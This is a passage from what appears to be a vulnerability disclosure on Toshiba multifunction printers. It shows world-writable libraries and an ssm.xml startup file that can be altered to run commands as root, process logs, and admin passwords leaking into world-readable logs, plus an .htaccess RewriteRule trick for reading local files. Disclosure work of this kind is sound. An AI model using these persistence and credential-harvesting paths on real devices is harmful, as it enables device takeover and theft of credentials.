\/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libhcrypto.so.4.1.0<br \/>-rwxrwxrwx 1 root root 759349 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libasn1.so.8.0.0<br \/>-rwxrwxrwx 1 root root 166289 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libwind.so.0.0.0<br \/>-rwxrwxrwx 1 root root 14571 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libcom_err.so.1.1.3<br \/>-rwxrwxrwx 1 root root 92942 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libroken.so.18.1.0<br \/>-rwxrwxrwx 1 root root 24134 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libheimntlm.so.0.1.0<\/p>\n<p>An attacker can remotely compromise any Toshiba printer.<\/p>\n<p>The libraries (more than hundreds) used by these programs can be<br \/>replaced by malicious libraries by any local or remote attacker.<\/p>\n<p>## Details &#8211; Local Privilege Escalation and Remote Code Execution using CISSM<\/p>\n<p>It was observed that the `cissm` program runs as root inside the<br \/>printers. This Toshiba-specific program will start children processes<br \/>as shown below, based on the content of the<br \/>`\/home\/SYSROM_SRC\/build\/common\/bin\/ssm.xml` XML file stored in the<br \/>printer:<\/p>\n<p>bash-4.1# ps auxw | grep cissm<br \/>root 1487 0.0 0.3 53496 10184 ? Sl 16:34 0:02<br \/>.\/cissm -T 7 -d ssm.xml<br \/>bash-4.1# pstree<br \/>[&#8230;]|-cissm-+-alAddressBookMg<br \/>| |-alCloning<br \/>| |-alExportImport<br \/>| |-alLogRetriever<br \/>| |-alLogmanager&#8212;{alLogmanager}<br \/>| |-alPanelStartLED&#8212;{alPanelStartLE}<br \/>| |-alPanelUIMessag&#8212;{alPanelUIMessa}<br \/>| |-alServiceUIPlug<br \/>| |-alUiFrameWork&#8212;24*[{alUiFrameWork}]| |-alViewPlugin&#8212;3*[{alViewPlugin}]| |-alaccountmgr&#8212;2*[{alaccountmgr}]| |-alappmanager-+-2*[python&#8212;5*[{python}]]| | `-15*[{alappmanager}]| |-alboserver&#8212;7*[{alboserver}]| |-alcbamanager&#8212;26*[{alcbamanager}]| |-aldevauthmgmtpl<br \/>| |-aldeviceconfigp<br \/>| |-aldeviceservice&#8212;{aldeviceservic}<br \/>| |-aleFilingmgr<br \/>| |-alfilestoragem<br \/>| |-algrpmgr<br \/>| |-alhddalertmgr<br \/>| |-alhddbackuprest<br \/>| |-alhomedatamgr<br \/>| |-alifaxreceive<br \/>| |-alintegritychkm<br \/>| |-aljobcontroller&#8212;8*[{aljobcontrolle}][&#8230;]\n<p>The XML configuration file used by cissm is located at<br \/>`\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/ssm.xml` and has insecure<br \/>permissions:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/release\/bin\/ssm.xml<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/ssm.xml<br \/>\/home\/SYSROM_SRC\/build\/common\/bin\/ssm.xml<br \/>-rwxrwxrwx 1 root root 55245 Oct 7 2021<br \/>\/home\/SYSROM_SRC\/build\/common\/bin\/ssm.xml<br \/>lrwxrwxrwx 1 root root 28 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/ssm.xml -&gt;<br \/>..\/..\/thirdparty\/bin\/ssm.xml<br \/>lrwxrwxrwx 1 root root 24 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/ssm.xml -&gt;<br \/>..\/..\/common\/bin\/ssm.xmlroot<\/p>\n<p>This file is used to run program as root when the printer starts and<br \/>can be used to redefine any program running as root when the printer<br \/>boots. This program also runs every 3 minute.<\/p>\n<p>An attacker can remotely write an additional entry to start a<br \/>malicious command that will be executed as root when the printer<br \/>boots:<\/p>\n<p>Content of `\/home\/SYSROM_SRC\/build\/common\/bin\/ssm.xml`:<\/p>\n<p>&lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;UTF-8&#8243;?&gt;<br \/>&lt;SSM xmlns:xsi=&#8221;http:\/\/www.w3.org\/2001\/XMLSchema-instance&#8221;<br \/>xsi:noNamespaceSchemaLocation=&#8221;..\/..\/..\/LayerInterface\/CI\/ServiceStartupManager\/SSM.xsd&#8221;&gt;<br \/>&lt;!&#8211; Start: CI Layer services &#8211;&gt;<br \/>&lt;Service&gt;<br \/>&lt;name&gt;cischeduler&lt;\/name&gt;<br \/>&lt;group\/&gt;<br \/>&lt;exePath&gt;.\/cischeduler&lt;\/exePath&gt;<br \/>&lt;startupType&gt;Automatic&lt;\/startupType&gt;<br \/>&lt;enabled&gt;1&lt;\/enabled&gt;<br \/>&lt;ProcessGroup&gt;TRUSTED&lt;\/ProcessGroup&gt;<br \/>&lt;StartParameters&gt;<br \/>&lt;Param&gt;-S&lt;\/Param&gt;<br \/>&lt;Param&gt;ramdisk&lt;\/Param&gt;<br \/>&lt;Param&gt;&gt;&lt;\/Param&gt;<br \/>&lt;Param&gt;\/work\/log\/ci\/cischeduler.log&lt;\/Param&gt;<br \/>&lt;\/StartParameters&gt;<br \/>&lt;\/Service&gt;<br \/>&lt;Service&gt;<br \/>&lt;name&gt;cipollproc&lt;\/name&gt;<br \/>&lt;group\/&gt;<br \/>&lt;exePath&gt;.\/cipollproc&lt;\/exePath&gt;<br \/>&lt;startupType&gt;Automatic&lt;\/startupType&gt;<br \/>&lt;enabled&gt;1&lt;\/enabled&gt;<br \/>&lt;ProcessGroup&gt;TRUSTED&lt;\/ProcessGroup&gt;<br \/>&lt;StartParameters&gt;<br \/>&lt;Param&gt;&gt;&lt;\/Param&gt;<br \/>&lt;Param&gt;\/work\/log\/ci\/cipollproc.log&lt;\/Param&gt;<br \/>&lt;\/StartParameters&gt;<br \/>&lt;StartupCondition&gt;<br \/>&lt;Condition&gt;<br \/>&lt;Service name=&#8221;cischeduler&#8221; state=&#8221;Ready&#8221;&gt;&lt;\/Service&gt;<br \/>&lt;\/Condition&gt;<br \/>&lt;\/StartupCondition&gt;<br \/>&lt;\/Service&gt;<br \/>[&#8230;]\n<p>Analysis of `pspy32` running on the printer:<\/p>\n<p>2023\/05\/27 20:32:43 CMD: UID=0 PID=4228 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:32:43 CMD: UID=0 PID=4229 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:32:46 CMD: UID=0 PID=4230 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:32:46 CMD: UID=0 PID=4231 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:32:50 CMD: UID=0 PID=4232 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:32:50 CMD: UID=0 PID=4233 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:32:53 CMD: UID=0 PID=4234 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:32:53 CMD: UID=0 PID=4235 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:32:56 CMD: UID=0 PID=4236 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:32:56 CMD: UID=0 PID=4237 | .\/cissm -T 7 -d ssm.xml<br \/>2023\/05\/27 20:32:56 CMD: UID=0 PID=4238 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>[&#8230;]2023\/05\/27 20:35:26 CMD: UID=0 PID=4393 | .\/cissm -T 7 -d ssm.xml<br \/>[&#8230;]2023\/05\/27 20:37:56 CMD: UID=0 PID=4532 | .\/cissm -T 7 -d ssm.xml<br \/>[&#8230;]2023\/05\/27 20:39:56 CMD: UID=0 PID=4676 | .\/cissm -T 7 -d ssm.xml<br \/>[&#8230;]2023\/05\/27 20:42:19 CMD: UID=0 PID=4831 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:42:19 CMD: UID=0 PID=4832 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:42:22 CMD: UID=0 PID=4833 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:42:22 CMD: UID=0 PID=4834 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:42:25 CMD: UID=0 PID=4835 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:42:25 CMD: UID=0 PID=4836 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:42:26 CMD: UID=0 PID=4837 | .\/cissm -T 7 -d ssm.xml<br \/>2023\/05\/27 20:42:27 CMD: UID=0 PID=4839 | sh -c ps -eo<br \/>stat,comm | grep -e &#8220;^Z.*agent&#8221; -e &#8220;^Z.*ebx_dl&#8221; -e &#8220;^Z.*de_ipfax&#8221;<br \/>2023\/05\/27 20:42:27 CMD: UID=0 PID=4838 | sh -c ps -eo<br \/>stat,comm | grep -e &#8220;^Z.*agent&#8221; -e &#8220;^Z.*ebx_dl&#8221; -e &#8220;^Z.*de_ipfax&#8221;<br \/>2023\/05\/27 20:42:29 CMD: UID=0 PID=4840 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:42:29 CMD: UID=0 PID=4841 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:42:32 CMD: UID=0 PID=4842 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:42:32 CMD: UID=0 PID=4843 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>[&#8230;]&lt;\/pre&gt;<\/p>\n<p>An attacker can remotely compromise any Toshiba printer.<\/p>\n<p>The `\/home\/SYSROM_SRC\/build\/common\/bin\/ssm.xml` configuration file can<br \/>be replaced by any local or remote attacker to run any malicious<br \/>program as root when the printer starts.<\/p>\n<p>Attackers can backdoor the printer.<\/p>\n<p>## Details &#8211; Passwords stored in clear-text logs and insecure logs<\/p>\n<p>It was observed that passwords are stored in clear-text logs.<\/p>\n<p>Some logs are stored inside the `\/ramdisk\/work\/log\/al` directory with<br \/>insecure permissions, allowing any local attacker to read and modify<br \/>these files:<\/p>\n<p>bash-4.1# ls -laR \/ramdisk\/work\/log\/al\/*<br \/>-rw-rw-rw- 1 root trusted 42678 May 23 16:10<br \/>\/ramdisk\/work\/log\/al\/accounting.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 2228 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/address.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 6877 May 23 15:16<br \/>\/ramdisk\/work\/log\/al\/alPanelStartLEDHandler.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 23536 May 23 16:10<br \/>\/ramdisk\/work\/log\/al\/alPanelUIMessageHandler.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 79 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/albluetooth.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 449 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/alcloning.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 1594 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/alcloudclient.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 987 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/aldevauthmgmtplugin.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 307378 May 23 16:11<br \/>\/ramdisk\/work\/log\/al\/aldeviceconfig.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 29171 May 23 15:16<br \/>\/ramdisk\/work\/log\/al\/aldeviceservice.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 128 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/aleSCL.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 474 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/alexportimport.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 1437 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/alfilestoragem.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 13465 May 23 16:11<br \/>\/ramdisk\/work\/log\/al\/allicensemgmt.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 5380 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/almaintenanceplugin.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 111 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/alnfcplugin.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 4432 May 23 16:05<br \/>\/ramdisk\/work\/log\/al\/alulm.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 682 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/alvnclauncher.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 67235 May 23 16:08<br \/>\/ramdisk\/work\/log\/al\/appmanager.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 31306 May 23 16:11<br \/>\/ramdisk\/work\/log\/al\/authplugin.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 590 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/bonjour.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 147834 May 23 16:15<br \/>\/ramdisk\/work\/log\/al\/boserver.log.0.txt<br \/>-rwxrwxrwx 1 root trusted 250542 May 23 16:14<br \/>\/ramdisk\/work\/log\/al\/boserverEvent.log.28.txt<br \/>-rw-rw-rw- 1 root trusted 1110 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/cbamanager.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 98 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/eBRlog.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 3311 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/efile.log.0.txt<br \/>-rwxrwxrwx 1 root trusted 567 May 23 16:10<br \/>\/ramdisk\/work\/log\/al\/grpmgrplugin.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 2277 May 23 16:10<br \/>\/ramdisk\/work\/log\/al\/hdm.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 206 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/ifaxrx.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 1037 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/jobcontroller.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 4714 May 23 15:41<br \/>\/ramdisk\/work\/log\/al\/jtm.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 610 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/logmanagerplugin.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 286932 May 23 15:23<br \/>\/ramdisk\/work\/log\/al\/logretriever.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 214 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/network-ipv6.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 22498 May 23 15:16<br \/>\/ramdisk\/work\/log\/al\/nsm.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 169537 May 23 16:01<br \/>\/ramdisk\/work\/log\/al\/panel.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 3403 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/printmanager.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 26623 May 23 16:10<br \/>\/ramdisk\/work\/log\/al\/prm.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 1264 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/remoteApplication.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 565116 May 23 16:11<br \/>\/ramdisk\/work\/log\/al\/renderer.log.2.txt<br \/>-rw-rw-rw- 1 root trusted 2434 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/reportmanager.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 426 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/reportmsgr.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 20834 May 23 16:11<br \/>\/ramdisk\/work\/log\/al\/restrictionmode.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 732 May 23 16:10<br \/>\/ramdisk\/work\/log\/al\/rolemanagerplugin.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 12464 May 23 16:11<br \/>\/ramdisk\/work\/log\/al\/securitysettingsplugin.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 19963 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/sharedprint.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 159 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/slp.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 798 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/snmpd.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 12287 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/stage2.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 5955 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/swupdate.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 2306 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/usb.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 1113 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/usbprn.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 14238 May 23 16:10<br \/>\/ramdisk\/work\/log\/al\/usermanagerplugin.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 2553 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/viewplugin.log.0.txt<\/p>\n<p>\/ramdisk\/work\/log\/al\/epfx:<br \/>total 28<br \/>drwxrwxrwx 4 root trusted 0 May 23 15:14 .<br \/>drwxrwxrwx 5 root trusted 0 May 23 16:10 ..<br \/>-rwxrwxrwx 1 root trusted 28010 May 23 16:08 eprocessframework.log.0.txt<br \/>drwxrwxrwx 2 apache trusted 0 May 23 15:14 httpd_worker_1711<br \/>drwxrwxrwx 2 apache trusted 0 May 23 15:14 httpd_worker_1712<\/p>\n<p>\/ramdisk\/work\/log\/al\/wsp:<br \/>total 4<br \/>drwxrwxrwx 2 root trusted 0 May 23 15:15 .<br \/>drwxrwxrwx 5 root trusted 0 May 23 16:10 ..<br \/>-rw-rw-rw- 1 root trusted 3600 May 23 16:14 alwsprint.log.0.txt<\/p>\n<p>\/ramdisk\/work\/log\/al\/wsscn:<br \/>total 4<br \/>drwxrwxrwx 2 root trusted 0 May 23 15:15 .<br \/>drwxrwxrwx 5 root trusted 0 May 23 16:10 ..<br \/>-rw-rw-rw- 1 root trusted 1083 May 23 15:15 alwswsc.log.0.txt<br \/>bash-4.1#<\/p>\n<p>### Clear-text password written in logs when an user logs into the printer<\/p>\n<p>When a user logs into the TopAccess web interface, the password will<br \/>be written in logs that are world-readable as shown below.<\/p>\n<p>Login as admin with the password `PASSWORD-SECRET-PIERRE`, we can see<br \/>the password saved into 2 log files that are world-readable:<\/p>\n<p>&#8211; &#8211; `\/ramdisk\/work\/log\/al\/boserverEvent.log.*.txt`<br \/>&#8211; &#8211; `\/ramdisk\/al\/network\/log\/http.log`<\/p>\n<p>Leak of credentials inside the log files:<\/p>\n<p>bash-4.1# grep -ri PIER .<br \/>.\/work\/log\/al\/boserverEvent.log.28.txt:&lt;Evt&gt;&lt;t&gt;05\/27<br \/>16:18:39443877&lt;\/t&gt;&lt;Set&gt;&lt;sID&gt;ContentWebServer_10.0.0.2.fda0f003cf95b852233893df36d9b1ff&lt;\/sID&gt;&lt;pID&gt;8556&lt;\/pID&gt;&lt;pName&gt;httpd&lt;\/pName&gt;&lt;SetValue&gt;&lt;Payload<br \/>XMLPayLoad = &#8220;true&#8221; overrideDelta =<br \/>&#8220;true&#8221;&gt;&lt;path&gt;&lt;\/path&gt;&lt;value&gt;&lt;Authentication&gt;&lt;UserCredential&gt;&lt;userName&gt;admin&lt;\/userName&gt;&lt;passwd&gt;PASSWORD-SECRET-PIERRE&lt;\/passwd&gt;&lt;ipaddress&gt;10.0.0.2&lt;\/ipaddress&gt;&lt;DepartmentManagement<br \/>isEnable=&#8221;false&#8221;&gt;&lt;requireDepartment\/&gt;&lt;\/DepartmentManagement&gt;&lt;domainName\/&gt;&lt;applicationType&gt;TOP_ACCESS&lt;\/applicationType&gt;&lt;\/UserCredential&gt;&lt;\/Authentication&gt;&lt;\/value&gt;&lt;\/Payload&gt;&lt;\/SetValue&gt;&lt;\/Set&gt;&lt;\/Evt&gt;<br \/>.\/al\/network\/log\/http.log:[Fri May 27 16:18:39.519454 2023][contentwebserver:debug] [pid 8556] ccontentwebserver.cpp(4175):<br \/>[client 10.0.0.2:41700] PASSWORD-SECRET-PIERRE, referer:<br \/>http:\/\/10.0.0.1:8080\/TopAccessLogin.html?v=1670282309ta<\/p>\n<p>These files have insecure permissions allowing any user to retrieve<br \/>the passwords and to modify the logs.<\/p>\n<p>The files can be also modified by a remote attacker using the<br \/>Pre-authenticated Remote Code Execution as root or apache and multiple<br \/>Local Privilege Escalations vulnerability.<\/p>\n<p>bash-4.1# ls -la \/ramdisk\/al\/network\/log\/http.log<br \/>ls -la \/ramdisk\/al\/network\/log\/http.log<br \/>-rw-rw-rw- 1 root trusted 663910 May 27 16:20<br \/>\/ramdisk\/al\/network\/log\/http.log<br \/>bash-4.1# ls -la \/ramdisk\/work\/log\/al\/boserverEvent.log.28.txt<br \/>ls -la \/ramdisk\/work\/log\/al\/boserverEvent.log.28.txt<br \/>-rwxrwxrwx 1 root trusted 715841 May 27 16:20<br \/>\/ramdisk\/work\/log\/al\/boserverEvent.log.28.txt<br \/>bash-4.1#<\/p>\n<p>### Clear-text password written in logs when a password is modified<\/p>\n<p>Using the TopAccess web interface, it is possible to update passwords of users.<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>Such password will be found in the log files (`NEW-PASSWORD-PIERRE`):<\/p>\n<p>bash-4.1# grep -r NEW-PASSWORD-PIERRE .<br \/>.\/work\/log\/al\/boserverEvent.log.28.txt:&lt;Evt&gt;&lt;t&gt;05\/27<br \/>16:22:22933938&lt;\/t&gt;&lt;Set&gt;&lt;sID&gt;ContentWebServer_10.0.0.2.63e5f73ea1d7ecf9cfd935393adb8b11&lt;\/sID&gt;&lt;pID&gt;4974&lt;\/pID&gt;&lt;pName&gt;httpd&lt;\/pName&gt;&lt;SetValue&gt;&lt;Payload<br \/>XMLPayLoad = &#8220;true&#8221; overrideDelta =<br \/>&#8220;true&#8221;&gt;&lt;path&gt;&lt;\/path&gt;&lt;value&gt;&lt;UserManager&gt;&lt;View&gt;&lt;UpdateUser&gt;&lt;User<br \/>ID=&#8221;10002&#8243;&gt;&lt;Information&gt;&lt;passwd&gt;NEW-PASSWORD-PIERRE&lt;\/passwd&gt;&lt;UserSoftKeyboardDisplay&gt;true&lt;\/UserSoftKeyboardDisplay&gt;&lt;\/Information&gt;&lt;\/User&gt;&lt;\/UpdateUser&gt;&lt;\/View&gt;&lt;\/UserManager&gt;&lt;\/value&gt;&lt;\/Payload&gt;&lt;\/SetValue&gt;&lt;\/Set&gt;&lt;\/Evt&gt;<br \/>bash-4.1#<\/p>\n<p>And this log file also has insecure permissions, allowing any user to<br \/>retrieve the passwords or to modify the log file.<\/p>\n<p>The files can be also modified by a remote attacker using the<br \/>Pre-authenticated Remote Code Execution as root or apache and multiple<br \/>Local Privilege Escalations vulnerability.<\/p>\n<p>bash-4.1# ls -la \/ramdisk\/work\/log\/al\/boserverEvent.log.28.txt<br \/>ls -la \/ramdisk\/work\/log\/al\/boserverEvent.log.28.txt<br \/>-rwxrwxrwx 1 root trusted 886685 May 27 16:23<br \/>\/ramdisk\/work\/log\/al\/boserverEvent.log.28.txt<br \/>bash-4.1#<\/p>\n<p>An attacker can retrieve passwords.<\/p>\n<p>An attacker can modify the logs.<\/p>\n<p>A remote attacker can retrieve the credentials and bypass the<br \/>authentication mechanism by uploading a .htaccess file containing a<br \/>RewriteRule (`RewriteRule \/pwned.txt file:\/path\/to\/local\/file`), using<br \/>the Pre-authenticated Remote Code Execution as root or apache and<br \/>multiple Local Privilege Escalations vulnerability.<\/p>\n<p>## Details &#8211; Leak of authentication sessions in insecure logs in<br \/>\/ramdisk\/work\/log directory<\/p>\n<p>It was observed that the session cookies, used for authentication, are<br \/>stored in clear-text logs. These logs are world-readable and some can<br \/>also be freely modified by any local attacker.<\/p>\n<p>Some logs are stored inside the 